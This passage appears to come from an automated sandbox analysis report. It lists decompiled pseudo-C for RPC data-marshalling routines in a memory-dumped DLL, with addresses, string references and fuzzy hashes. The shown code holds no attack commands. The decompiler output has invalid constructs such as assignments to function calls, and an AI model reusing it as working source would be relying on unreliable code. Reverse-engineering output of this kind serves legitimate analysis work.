                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0xf:
                                                                                                									L11:
                                                                                                									__ecx = __ebp - 0x28;
                                                                                                									__edx =  *(__ebp + 8);
                                                                                                									E6EDAAFA0( *(__ebp + 8), __ebp - 0x28, 4) =  *(__ebp + 0xc);
                                                                                                									__ecx =  *(__ebp - 0x28);
                                                                                                									 *( *(__ebp + 0xc)) =  *(__ebp - 0x28);
                                                                                                									__edx =  *(__ebp + 0xc);
                                                                                                									_push( *(__ebp + 0xc));
                                                                                                									__eax =  *(__ebp + 0xc);
                                                                                                									__ecx =  *( *(__ebp + 0xc));
                                                                                                									_push(__ecx);
                                                                                                									_push("uint3264=%ld => %p\n");
                                                                                                									0x6eda0000();
                                                                                                									__esp = __esp + 0xc;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 4;
                                                                                                									while(1) {
                                                                                                										L47:
                                                                                                										 *(_t210 + 0x10) =  &(( *(_t210 + 0x10))[1]);
                                                                                                										goto L1;
                                                                                                									}
                                                                                                								case 0x10:
                                                                                                									goto L46;
                                                                                                							}
                                                                                                						}
                                                                                                						return  *(_t210 + 0xc);
                                                                                                					}
                                                                                                				}
                                                                                                			}





                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9979
                                                                                                0x6eda997b
                                                                                                0x6eda997f
                                                                                                0x6eda9983
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda9990
                                                                                                0x6eda9992
                                                                                                0x6eda999a
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda99a7
                                                                                                0x6eda99a7
                                                                                                0x6eda99ad
                                                                                                0x6eda99b7
                                                                                                0x6eda99bf
                                                                                                0x6eda99c2
                                                                                                0x6eda99c5
                                                                                                0x6eda99c8
                                                                                                0x6eda99cc
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda99d4
                                                                                                0x6eda99d9
                                                                                                0x6eda99dc
                                                                                                0x6eda99e3
                                                                                                0x6eda99e6
                                                                                                0x6eda99ec
                                                                                                0x6eda99ef
                                                                                                0x6eda99f2
                                                                                                0x6eda99f8
                                                                                                0x6eda99fb
                                                                                                0x6eda99fe
                                                                                                0x6eda9a02
                                                                                                0x6eda9a0e
                                                                                                0x6eda9a11
                                                                                                0x6eda9a14
                                                                                                0x6eda9a15
                                                                                                0x6eda9a18
                                                                                                0x6eda9a19
                                                                                                0x6eda9a1e
                                                                                                0x6eda9a23
                                                                                                0x6eda9a26
                                                                                                0x6eda9a2c
                                                                                                0x6eda9a2e
                                                                                                0x6eda9a34
                                                                                                0x6eda9a38
                                                                                                0x6eda9a3d
                                                                                                0x6eda9a40
                                                                                                0x6eda9a43
                                                                                                0x6eda9a46
                                                                                                0x6eda9a49
                                                                                                0x6eda9a50
                                                                                                0x6eda9a57
                                                                                                0x6eda9a8a
                                                                                                0x6eda9a8d
                                                                                                0x6eda9a90
                                                                                                0x6eda9a91
                                                                                                0x6eda9a96
                                                                                                0x6eda9a9b
                                                                                                0x6eda9a59
                                                                                                0x6eda9a59
                                                                                                0x6eda9a5c
                                                                                                0x6eda9a62
                                                                                                0x6eda9a77
                                                                                                0x6eda9a79
                                                                                                0x6eda9a7c
                                                                                                0x6eda9a7d
                                                                                                0x6eda9a80
                                                                                                0x6eda9a81
                                                                                                0x6eda9a84
                                                                                                0x6eda9a85
                                                                                                0x6eda9a64
                                                                                                0x6eda9a64
                                                                                                0x6eda9a66
                                                                                                0x6eda9a69
                                                                                                0x6eda9a6a
                                                                                                0x6eda9a6d
                                                                                                0x6eda9a6e
                                                                                                0x6eda9a71
                                                                                                0x6eda9a72
                                                                                                0x6eda9a72
                                                                                                0x6eda9a88
                                                                                                0x6eda9a9e
                                                                                                0x6eda9aa1
                                                                                                0x6eda9aa4
                                                                                                0x6eda9aaa
                                                                                                0x6eda9aad
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda96a8
                                                                                                0x6eda96aa
                                                                                                0x6eda96b2
                                                                                                0x6eda96ba
                                                                                                0x6eda96bd
                                                                                                0x6eda96c0
                                                                                                0x6eda96c2
                                                                                                0x6eda96c5
                                                                                                0x6eda96c6
                                                                                                0x6eda96c9
                                                                                                0x6eda96cb
                                                                                                0x6eda96cc
                                                                                                0x6eda96d1
                                                                                                0x6eda96d6
                                                                                                0x6eda96dc
                                                                                                0x6eda96df
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x6eda96e7
                                                                                                0x6eda96e9
                                                                                                0x6eda96ed
                                                                                                0x6eda96f9
                                                                                                0x6eda96fc
                                                                                                0x6eda96ff
                                                                                                0x6eda9701
                                                                                                0x6eda9704
                                                                                                0x6eda9705
                                                                                                0x6eda9708
                                                                                                0x6eda970a
                                                                                                0x6eda970b
                                                                                                0x6eda9710
                                                                                                0x6eda9715
                                                                                                0x6eda971b
                                                                                                0x6eda971e
                                                                                                0x6eda9acb
                                                                                                0x6eda9acb
                                                                                                0x6eda9ad1
                                                                                                0x00000000
                                                                                                0x6eda9ad4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6eda95a4
                                                                                                0x6eda9adf
                                                                                                0x6eda9adf
                                                                                                0x6eda9acb

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F5), ref: 6EDA965D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: buffer overflow %d bytes$buffer=%d/%d$byte=%d => %p$double=%f => %p$enum16=%d => %p$float=%f => %p$long=%d => %p$longlong=%s => %p$pointer => %p$short=%d => %p
                                                                                                • API String ID: 3997070919-1168472477
                                                                                                • Opcode ID: ef7247fcddefc51af157166d13ee9a8e64d55d37e59f7942fa2636bd298bb3bf
                                                                                                • Instruction ID: 3ab9e24cfc454bc01401883f2439e54d7f1c914600576aedb73d0680017724af
                                                                                                • Opcode Fuzzy Hash: ef7247fcddefc51af157166d13ee9a8e64d55d37e59f7942fa2636bd298bb3bf
                                                                                                • Instruction Fuzzy Hash: 90C12AB5A00109AFCB04CF99E890EAA7BB5AF89314F04C519FA594F345E731EB51CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 29%
                                                                                                			E6EDA3600(intOrPtr _a4, signed int* _a8, signed char* _a12, signed int _a16) {
                                                                                                				signed char* _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				signed char* _v16;
                                                                                                				signed int _v20;
                                                                                                				signed int _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				intOrPtr _t94;
                                                                                                				intOrPtr _t98;
                                                                                                				signed int _t115;
                                                                                                				signed char* _t132;
                                                                                                				signed char* _t160;
                                                                                                				void* _t178;
                                                                                                				void* _t179;
                                                                                                				void* _t183;
                                                                                                				void* _t184;
                                                                                                
                                                                                                				_v8 = _a12;
                                                                                                				0x6eda0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                                				_t179 = _t178 + 0x14;
                                                                                                				_a12 = _a12 + 6;
                                                                                                				if(( *_v8 & 0x000000ff) != 0x18 && ( *_v8 & 0x000000ff) != 0x17) {
                                                                                                					0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_v16 =  &(_v8[_v8[4] + 4]);
                                                                                                				__eflags = ( *_v16 & 0x000000ff) - 0x1b;
                                                                                                				if(__eflags == 0) {
                                                                                                					_v24 = _v16[2] & 0x0000ffff;
                                                                                                					_v16 = E6EDAA460( &(_v16[4]), __eflags, _a4,  &(_v16[4]));
                                                                                                					E6EDA73D0((_v8[1] & 0x000000ff) + 1, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
                                                                                                					0x6eda0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
                                                                                                					_t94 = E6EDAAEC0(_v24,  *((intOrPtr*)(_a4 + 0x3c)));
                                                                                                					_t183 = _t179 + 0x20;
                                                                                                					_v12 = _t94;
                                                                                                					_t160 = _v8;
                                                                                                					_t132 = _v8;
                                                                                                					__eflags = ( *(_t160 + 2) & 0x0000ffff) + _v12 - ( *(_t132 + 2) & 0x0000ffff);
                                                                                                					if(( *(_t160 + 2) & 0x0000ffff) + _v12 < ( *(_t132 + 2) & 0x0000ffff)) {
                                                                                                						0x6eda0000("integer overflow of memory_size %u with bufsize %u\n", _v8[2] & 0x0000ffff, _v12);
                                                                                                						_t183 = _t183 + 0xc;
                                                                                                						__imp__RpcRaiseException(0x6f7);
                                                                                                					}
                                                                                                					__eflags = _a16 & 0x000000ff;
                                                                                                					if((_a16 & 0x000000ff) == 0) {
                                                                                                						_t98 = _a4;
                                                                                                						__eflags =  *(_t98 + 0x20) & 0x000000ff;
                                                                                                						if(( *(_t98 + 0x20) & 0x000000ff) == 0) {
                                                                                                							__eflags =  *_a8;
                                                                                                							if( *_a8 == 0) {
                                                                                                								 *_a8 =  *(_a4 + 4);
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						_v28 = (_v8[2] & 0x0000ffff) + _v12;
                                                                                                						_t115 = E6EDAA3B0(_a4, _a4, _v28);
                                                                                                						_t183 = _t183 + 8;
                                                                                                						 *_a8 = _t115;
                                                                                                					}
                                                                                                					 *(_a4 + 0x10) =  *(_a4 + 4);
                                                                                                					_v20 =  *(_a4 + 0x10);
                                                                                                					E6EDAAF00(_a4, (_v8[2] & 0x0000ffff) + _v12);
                                                                                                					_t184 = _t183 + 8;
                                                                                                					__eflags = ( *_v8 & 0x000000ff) - 0x18;
                                                                                                					if(( *_v8 & 0x000000ff) == 0x18) {
                                                                                                						E6EDAC2B0(_a4, _v20,  *_a8, _a12, _a16 & 0x000000ff);
                                                                                                						_t184 = _t184 + 0x14;
                                                                                                					}
                                                                                                					0x6eda0000("copying %p to %p\n", _v20,  *_a8);
                                                                                                					__eflags =  *_a8 - _v20;
                                                                                                					if( *_a8 != _v20) {
                                                                                                						__eflags = (_v8[2] & 0x0000ffff) + _v12;
                                                                                                						E6EDB0120( *_a8, _v20, (_v8[2] & 0x0000ffff) + _v12);
                                                                                                					}
                                                                                                					__eflags = 0;
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					0x6eda0000("invalid array format type %x\n",  *_v8 & 0x000000ff);
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                					return 0;
                                                                                                				}
                                                                                                			}



















                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA3662
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA36A4
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA3749
                                                                                                Strings
                                                                                                • integer overflow of memory_size %u with bufsize %u, xrefs: 6EDA3737
                                                                                                • (%p, %p, %p, %d), xrefs: 6EDA361D
                                                                                                • invalid format type %x, xrefs: 6EDA3650
                                                                                                • memory_size = %d, xrefs: 6EDA36F3
                                                                                                • copying %p to %p, xrefs: 6EDA37F9
                                                                                                • invalid array format type %x, xrefs: 6EDA3692
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p, %d)$copying %p to %p$integer overflow of memory_size %u with bufsize %u$invalid array format type %x$invalid format type %x$memory_size = %d
                                                                                                • API String ID: 3997070919-1713900660
                                                                                                • Opcode ID: fc3c5fdb91aa7de844fcab53730f88c2eac2357819e894467bd5b4b949fa77b3
                                                                                                • Instruction ID: 9a40063eab00470a82aad4c60786b112326965a51d3e9264e2a3b6cff0b3658c
                                                                                                • Opcode Fuzzy Hash: fc3c5fdb91aa7de844fcab53730f88c2eac2357819e894467bd5b4b949fa77b3
                                                                                                • Instruction Fuzzy Hash: 237151B5A00104EFCB44CFD8D890DAEBBB6AF89205F148589F9599B341E330EF51CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA3840(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
                                                                                                				signed char* _v8;
                                                                                                				signed char* _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				intOrPtr _v32;
                                                                                                				char _v36;
                                                                                                				intOrPtr _v40;
                                                                                                				intOrPtr* _t124;
                                                                                                				void* _t126;
                                                                                                				intOrPtr _t129;
                                                                                                				void* _t133;
                                                                                                				void* _t197;
                                                                                                				void* _t198;
                                                                                                				void* _t199;
                                                                                                				void* _t200;
                                                                                                				void* _t203;
                                                                                                
                                                                                                				_v8 = _a12;
                                                                                                				0x6eda0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                                				_t200 = _t199 + 0x14;
                                                                                                				_a12 = _a12 + 6;
                                                                                                				if(( *_v8 & 0x000000ff) == 0x19) {
                                                                                                					_v12 =  &(_v8[_v8[4] + 4]);
                                                                                                					_v28 = E6EDAD650( *_v12 & 0x000000ff, _a4, _v12);
                                                                                                					E6EDA73D0((_v8[1] & 0x000000ff) + 1, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
                                                                                                					0x6eda0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
                                                                                                					_t203 = _t200 + 0x1c;
                                                                                                					if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                                						_a16 = 1;
                                                                                                					}
                                                                                                					if((_a16 & 0x000000ff) != 0) {
                                                                                                						_v32 = (_v8[2] & 0x0000ffff) + _v28;
                                                                                                						_t129 = E6EDAA3B0(_v32, _a4, _v32);
                                                                                                						_t203 = _t203 + 8;
                                                                                                						 *_a8 = _t129;
                                                                                                					}
                                                                                                					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
                                                                                                					_v16 =  *((intOrPtr*)(_a4 + 0x10));
                                                                                                					E6EDAAF00(_a4, _v8[2] & 0x0000ffff);
                                                                                                					_v36 = (_v8[2] & 0x0000ffff) +  *_a8;
                                                                                                					_v20 = E6EDAD830(_t133, _t197, _t198,  *_v12 & 0x000000ff, _a4,  &_v36, _v12, 0, 0, 0);
                                                                                                					_v40 =  *((intOrPtr*)(_a4 + 0x40));
                                                                                                					_v24 =  *((intOrPtr*)(_a4 + 4));
                                                                                                					E6EDAAF00(_a4, _v20);
                                                                                                					E6EDAC2B0(_a4, _v16,  *_a8, _a12, _a16 & 0x000000ff);
                                                                                                					E6EDB0120( *_a8, _v16, _v8[2] & 0x0000ffff);
                                                                                                					0x6eda0000("copying %p to %p\n", _v24, (_v8[2] & 0x0000ffff) +  *_a8);
                                                                                                					E6EDB0120( *_a8 + (_v8[2] & 0x0000ffff) + _v40, _v24, _v20);
                                                                                                					if(( *_v12 & 0x000000ff) != 0x22) {
                                                                                                						if(( *_v12 & 0x000000ff) == 0x25) {
                                                                                                							_t124 = _a8;
                                                                                                							0x6eda0000((_v8[2] & 0x0000ffff) +  *_t124);
                                                                                                							0x6eda0000("string=%s\n", _t124);
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t126 = (_v8[2] & 0x0000ffff) +  *_a8;
                                                                                                						0x6eda0000(_t126);
                                                                                                						0x6eda0000("string=%s\n", _t126);
                                                                                                					}
                                                                                                					return 0;
                                                                                                				}
                                                                                                				0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
                                                                                                				__imp__RpcRaiseException(0x6e6);
                                                                                                				return 0;
                                                                                                			}






















                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA3897
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p, %d)$copying %p to %p$invalid format type %x$memory_size = %d$string=%s$string=%s
                                                                                                • API String ID: 3997070919-4074488482
                                                                                                • Opcode ID: 33550d3d5dd4f3c112987691ef2da349e02b4af40054ac62c638130a24e7c18d
                                                                                                • Instruction ID: 53046799e6fba79498dbed2e33f2992f672a3675a399e9a0241d6effa83ea30e
                                                                                                • Opcode Fuzzy Hash: 33550d3d5dd4f3c112987691ef2da349e02b4af40054ac62c638130a24e7c18d
                                                                                                • Instruction Fuzzy Hash: D18140B5900118AFCB04CF98D890DAEB7BAAF89305F14C558F9499B345E734EF50DBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (%p,%p,%p)$deref$no memorysizer for data type=%02x$pointer_id is 0x%08x$pointer_id is 0x%08x$type=0x%x, attr=$unhandled ptr type=%02x
                                                                                                • API String ID: 0-2530590018
                                                                                                • Opcode ID: 168ba1c1671128bef0c91a99aa72716ac3b3159baf19d2b2fd5908499e66562c
                                                                                                • Instruction ID: 8cc043684050ab8694825ff5ab123ee0344bc8afec5fc960e8451d14a5a4e516
                                                                                                • Opcode Fuzzy Hash: 168ba1c1671128bef0c91a99aa72716ac3b3159baf19d2b2fd5908499e66562c
                                                                                                • Instruction Fuzzy Hash: 768102B190416A9FDB04CF99C841BBDBBB1EF85301F048169F9959B2C5D338DB51DBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 37%
                                                                                                			E6EDA74D0(signed int _a4, signed short* _a8, signed char* _a12) {
                                                                                                				char _v8;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                
                                                                                                				0x6eda0000("pStubMsg %p, pMemory %p, type 0x%02x\n", _a4, _a8,  *_a12 & 0x000000ff);
                                                                                                				_v12 =  *_a12 & 0x000000ff;
                                                                                                				_v12 = _v12 - 1;
                                                                                                				if(_v12 > 0xb8) {
                                                                                                					L13:
                                                                                                					0x6eda0000("Unhandled base type: 0x%02x\n",  *_a12 & 0x000000ff);
                                                                                                				} else {
                                                                                                					_t10 = _v12 + 0x6eda7728; // 0xcccccc08
                                                                                                					switch( *((intOrPtr*)(( *_t10 & 0x000000ff) * 4 +  &M6EDA7700))) {
                                                                                                						case 0:
                                                                                                							E6EDAB030(_a4, _a8, 1);
                                                                                                							_push( *_a8 & 0x000000ff);
                                                                                                							_push("value: 0x%02x\n");
                                                                                                							0x6eda0000();
                                                                                                							goto L14;
                                                                                                						case 1:
                                                                                                							__ecx = _a4;
                                                                                                							__ecx = _a4 + 4;
                                                                                                							__eax = E6EDA7400(_a4 + 4, _a4 + 4, 2);
                                                                                                							__edx = _a8;
                                                                                                							_a4 = E6EDAB030(_a4, _a8, 2);
                                                                                                							__ecx = _a8;
                                                                                                							__edx =  *_a8 & 0x0000ffff;
                                                                                                							_push( *_a8 & 0x0000ffff);
                                                                                                							_push("value: 0x%04x\n");
                                                                                                							0x6eda0000();
                                                                                                							__esp = __esp + 8;
                                                                                                							goto L14;
                                                                                                						case 2:
                                                                                                							_a4 = _a4 + 4;
                                                                                                							__eax = E6EDA7400(__ecx, _a4 + 4, 4);
                                                                                                							__ecx = _a8;
                                                                                                							__edx = _a4;
                                                                                                							E6EDAB030(_a4, _a8, 4) = _a8;
                                                                                                							__ecx =  *_a8;
                                                                                                							_push( *_a8);
                                                                                                							_push("value: 0x%08x\n");
                                                                                                							0x6eda0000();
                                                                                                							__esp = __esp + 8;
                                                                                                							goto L14;
                                                                                                						case 3:
                                                                                                							_a4 = _a4 + 4;
                                                                                                							E6EDA7400(__ecx, _a4 + 4, 4) = _a8;
                                                                                                							__ecx = _a4;
                                                                                                							__eax = E6EDAB030(_a4, _a8, 4);
                                                                                                							goto L14;
                                                                                                						case 4:
                                                                                                							_a4 = _a4 + 4;
                                                                                                							E6EDA7400(__ecx, _a4 + 4, 8) = _a8;
                                                                                                							__ecx = _a4;
                                                                                                							__eax = E6EDAB030(_a4, _a8, 8);
                                                                                                							__edx = _a8;
                                                                                                							__eax =  *(__edx + 4);
                                                                                                							_push(__eax);
                                                                                                							__ecx =  *__edx;
                                                                                                							_push( *__edx);
                                                                                                							0x6eda0000();
                                                                                                							__esp = __esp + 8;
                                                                                                							_push(__eax);
                                                                                                							_push("value: %s\n");
                                                                                                							0x6eda0000();
                                                                                                							__esp = __esp + 8;
                                                                                                							goto L14;
                                                                                                						case 5:
                                                                                                							_a4 = _a4 + 4;
                                                                                                							E6EDA7400(__ecx, _a4 + 4, 8) = _a8;
                                                                                                							__ecx = _a4;
                                                                                                							__eax = E6EDAB030(_a4, _a8, 8);
                                                                                                							goto L14;
                                                                                                						case 6:
                                                                                                							__edx = _a8;
                                                                                                							_v8 =  *_a8;
                                                                                                							__ecx = _a8;
                                                                                                							if( *__ecx > 0x7fff) {
                                                                                                								_push(0x6f5);
                                                                                                								__imp__RpcRaiseException();
                                                                                                							}
                                                                                                							_a4 = _a4 + 4;
                                                                                                							E6EDA7400(__ecx, _a4 + 4, 2) =  &_v8;
                                                                                                							__ecx = _a4;
                                                                                                							__eax = E6EDAB030(_a4,  &_v8, 2);
                                                                                                							__edx = _a8;
                                                                                                							__eax =  *_a8;
                                                                                                							_push( *_a8);
                                                                                                							_push("value: 0x%04x\n");
                                                                                                							0x6eda0000();
                                                                                                							__esp = __esp + 8;
                                                                                                							goto L14;
                                                                                                						case 7:
                                                                                                							goto L14;
                                                                                                						case 8:
                                                                                                							__ecx = _a8;
                                                                                                							__edx =  *__ecx;
                                                                                                							_v16 =  *__ecx;
                                                                                                							_a4 = _a4 + 4;
                                                                                                							__eax = E6EDA7400(__ecx, _a4 + 4, 4);
                                                                                                							__ecx =  &_v16;
                                                                                                							__edx = _a4;
                                                                                                							__eax = E6EDAB030(_a4,  &_v16, 4);
                                                                                                							goto L14;
                                                                                                						case 9:
                                                                                                							goto L13;
                                                                                                					}
                                                                                                				}
                                                                                                				L14:
                                                                                                				return 0;
                                                                                                			}







                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F5), ref: 6EDA7676
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: Unhandled base type: 0x%02x$pStubMsg %p, pMemory %p, type 0x%02x$value: %s$value: 0x%02x$value: 0x%04x$value: 0x%04x$value: 0x%08x
                                                                                                • API String ID: 3997070919-2832912556
                                                                                                • Opcode ID: db775fc221c625dba6cf69c8b24416b0ed65143970ac05acb48e83d706034bb5
                                                                                                • Instruction ID: 12f2b26af8df171ee9151ef0d0a5421d2890b2b2c6847000333e7a69674bf0fe
                                                                                                • Opcode Fuzzy Hash: db775fc221c625dba6cf69c8b24416b0ed65143970ac05acb48e83d706034bb5
                                                                                                • Instruction Fuzzy Hash: F2518DF9A00108BBD700CFACDC41FA93B69AB85349F04C418FF599B385E676E7158BA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 21%
                                                                                                			E6EDADAD3() {
                                                                                                				intOrPtr _t75;
                                                                                                				signed int _t80;
                                                                                                				intOrPtr* _t81;
                                                                                                				intOrPtr _t84;
                                                                                                				intOrPtr _t88;
                                                                                                				void* _t134;
                                                                                                				void* _t136;
                                                                                                				void* _t137;
                                                                                                
                                                                                                				if(( *(_t134 + 8) & 0x000000ff) != 0x22) {
                                                                                                					 *(_t134 - 8) = 2;
                                                                                                				} else {
                                                                                                					 *(_t134 - 8) = 1;
                                                                                                				}
                                                                                                				E6EDAA540( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x3c)),  *((intOrPtr*)(_t134 + 0xc)), 0,  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x3c)));
                                                                                                				_t137 = _t136 + 0xc;
                                                                                                				if((( *(_t134 + 0x14))[1] & 0x000000ff) != 0x44 &&  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x3c)) !=  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x44))) {
                                                                                                					0x6eda0000("buffer size %d must equal memory size %ld for non-sized conformant strings\n",  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x44)),  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x3c)));
                                                                                                					_t137 = _t137 + 0xc;
                                                                                                					__imp__RpcRaiseException(0x6c6);
                                                                                                				}
                                                                                                				if( *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x40)) != 0) {
                                                                                                					0x6eda0000("conformant strings can\'t have Offset (%d)\n",  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x40)));
                                                                                                					_t137 = _t137 + 8;
                                                                                                					__imp__RpcRaiseException(0x6c6);
                                                                                                				}
                                                                                                				 *((intOrPtr*)(_t134 - 0x14)) = E6EDAAEC0( *(_t134 - 8) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x3c)));
                                                                                                				 *((intOrPtr*)(_t134 - 0xc)) = E6EDAAEC0( *(_t134 - 8) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)(_t134 + 0xc)) + 0x44)));
                                                                                                				E6EDAB0C0( *(_t134 - 8) & 0x0000ffff,  *((intOrPtr*)(_t134 + 0xc)),  *((intOrPtr*)(_t134 - 0xc)),  *(_t134 - 8) & 0x0000ffff);
